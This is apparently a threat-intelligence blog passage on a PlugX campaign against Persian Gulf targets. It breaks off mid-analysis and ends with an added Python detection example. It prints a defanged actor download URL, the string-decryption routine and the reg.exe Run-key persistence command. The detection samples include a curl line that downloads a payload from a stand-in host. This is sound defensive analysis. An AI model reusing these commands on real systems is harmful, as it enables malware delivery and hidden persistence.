China-nexus Threat Actor Targets Persian Gulf Region With PlugX

Introduction

On March 1, 2026, ThreatLabz observed new activity from a China-nexus threat actor targeting countries in the Persian Gulf region. The activity took place within the first 24 hours of the renewed conflict in the Middle East. The threat actor quickly weaponized the theme of the conflict, using an Arabic-language document lure depicting missile attacks for social engineering.

The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. Based on the tools, techniques, and procedures (TTPs) observed, ThreatLabz attributes this activity to a China-nexus threat actor with high confidence, and assesses with medium confidence that it may be linked to Mustang Panda.

In this blog post, ThreatLabz examines the end-to-end attack chain in depth, including Windows shortcut (LNK) and CHM-based droppers, a loader with highly obfuscated shellcode, and a PlugX backdoor.

Key Takeaways

- In March 2026, ThreatLabz observed activity by a China-nexus threat actor targeting countries in the Persian Gulf region.
- The campaign used a multi-stage attack chain to deploy a PlugX backdoor variant on infected systems.
- The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering.
- The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DoH) for domain resolution.

Technical Analysis

Attack chain

On March 1, 2026, ThreatLabz identified an attack chain themed around the ongoing Middle East conflict that delivered its payloads via a ZIP archive. The archive included a Windows shortcut (LNK) file that, when opened, downloaded a malicious Windows Compiled HTML Help (CHM) file from a threat actor-controlled server. The CHM content was then leveraged to deploy a multi-stage payload, progressing from a shellcode loader to heavily obfuscated shellcode, and ultimately to the installation of a PlugX backdoor variant.
The attack chain is shown in the figure below.

Figure 1: Attack chain leading to deployment of PlugX.

As part of the lure, the attack dropped a decoy PDF containing images of missile strikes. The Arabic text in the PDF translates to "Iranian missile strikes against US base in Bahrain". The figure below shows the decoy PDF file used in this attack.

Figure 2: PDF lure referencing Iranian missile strikes against a US base in Bahrain.

The following sections summarize the observed attack flow and the files involved.

Stage 1 (ZIP, CHM, and LNK)

The ZIP archive contains an LNK file named photo_2026-03-01_01-20-48.pdf.lnk. The LNK's target command line uses cURL to download a malicious CHM file from hxxps://www.360printsol[.]com/2026/alfadhalah/thumbnail?img=index.png. The LNK file then uses the legitimate Windows HTML Help executable (hh.exe) with the -decompile option to extract the CHM contents. The table below summarizes the files extracted from the CHM.

Filename    Description
0.lnk       Stage 2 Windows shortcut.
3           Decoy PDF used as a lure.
4           TAR archive containing malicious components.

Table 1: Files extracted from the CHM

The Stage 1 LNK launches the Stage 2 shortcut (0.lnk).

Stage 2 (Second LNK, decoy PDF, and TAR extraction)

The Stage 2 LNK performs the following actions:

1. Moves the decoy PDF from the file named 3 to photo_2026-03-01_01-20-48.pdf (in the same directory).
2. Treats file 4 as a TAR archive and extracts its contents into %AppData%.
3. Executes %AppData%\BaiduNetdisk\ShellFolder.exe with the argument --path a.

The figure below shows the directory structure of the files extracted from the TAR archive.

Figure 3: Directory structure of the TAR archive.

Next, ShellFolder.exe uses DLL sideloading to load a malicious DLL named ShellFolderDepend.dll.

ShellFolderDepend.dll analysis (shellcode loader)

ShellFolderDepend.dll is a 32-bit DLL that establishes persistence, and then decrypts and executes an encrypted shellcode payload stored in Shelter.ex.

The shellcode loader stores its strings in encrypted form and decrypts them at runtime using a custom index-based XOR algorithm that incorporates an additive constant, as shown below.

    KEY_BASE = 0x34

    def decrypt_string(encrypted_bytes):
        # Each byte is XORed with its own index plus the constant, masked to one byte
        decrypted = []
        for i, byte in enumerate(encrypted_bytes):
            key = (i + KEY_BASE) & 0xFF
            decrypted.append(chr(byte ^ key))
        return "".join(decrypted)

To establish persistence, the DLL enumerates running processes to determine whether bdagent.exe (Bitdefender Agent) is present. Based on the result, the DLL uses one of two persistence methods:

- If bdagent.exe is running, the DLL uses reg.exe to set a Run entry pointing to the host binary (ShellFolder.exe) to start the malware when a user logs in: C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /reg:64 /v BaiNetdisk /t REG_SZ /d "\"%s\" --path a" /f
- If bdagent.exe is not running, the DLL sets the same Run entry directly using RegSetValueExA.

Before decrypting and loading the shellcode, the shellcode l

[…]
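As an added detection example (not ThreatLabz's code), the Stage 1, Stage 2 and persistence behaviours described above expressed as process-creation rules and evaluated over constructed sample events; the host names, user path and download URL are assumed placeholders, and only the reg.exe persistence branch is visible in process telemetry (the RegSetValueExA branch needs registry-write telemetry).

```python
import re

# Added example, not ThreatLabz code: behavioural rules for the chain described
# above, run over constructed process-creation events (host + command line).
RULES = [
    # Stage 1: hh.exe run with -decompile is rare outside of software installers
    ("stage1_hh_decompile", re.compile(r"\bhh(?:\.exe)?\b.*\s-decompile\b", re.I)),
    # Stage 1: curl pulling a remote object; low signal alone, so it is only
    # counted together with other stages on the same host
    ("stage1_curl_download", re.compile(r"\bcurl(?:\.exe)?\b.*\shttps?://", re.I)),
    # Stage 2: sideload host started from %AppData%\BaiduNetdisk with --path a
    ("stage2_sideload_host", re.compile(
        r'^"?[A-Z]:\\Users\\[^\\]+\\AppData\\Roaming\\BaiduNetdisk\\ShellFolder\.exe"?\s+--path\s+a\b', re.I)),
    # Persistence via reg.exe (the RegSetValueExA path needs registry telemetry instead)
    ("persist_reg_run_key", re.compile(
        r"\breg(?:\.exe)?\s+ADD\b.*\\CurrentVersion\\Run\b.*/v\s+BaiNetdisk\b", re.I)),
]

# Constructed sample events: WS01 shows the full chain, WS02 only benign lookalikes.
# The download host is a placeholder, not the real lure domain.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r'"C:\Windows\System32\cmd.exe" /c curl -o %TEMP%\index.chm https://lure.example/thumbnail?img=index.png'},
    {"host": "WS01", "cmdline": r'"C:\Windows\hh.exe" -decompile %TEMP%\out %TEMP%\index.chm'},
    {"host": "WS01", "cmdline": r'"C:\Users\u\AppData\Roaming\BaiduNetdisk\ShellFolder.exe" --path a'},
    {"host": "WS01", "cmdline": r'C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /reg:64 /v BaiNetdisk /t REG_SZ /d "\"C:\Users\u\AppData\Roaming\BaiduNetdisk\ShellFolder.exe\" --path a" /f'},
    {"host": "WS02", "cmdline": r'"C:\Windows\System32\curl.exe" https://updates.example/agent.msi -o agent.msi'},
    {"host": "WS02", "cmdline": r'"C:\Windows\hh.exe" "C:\Program Files\App\help.chm"'},
]


def match_rules(cmdline):
    """Names of all rules whose pattern matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def detect_chain(events, min_stages=2):
    """Collect rule hits per host; flag hosts where at least min_stages distinct rules fired."""
    hits = {}
    for ev in events:
        for name in match_rules(ev["cmdline"]):
            hits.setdefault(ev["host"], set()).add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= min_stages}


if __name__ == "__main__":
    print(detect_chain(SAMPLE_EVENTS))  # only WS01 is flagged
```

Requiring two or more distinct stages per host keeps the low-signal curl rule from paging on routine downloads while still catching the chain when its stages appear together.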

This article has been indexed from Security Boulevard
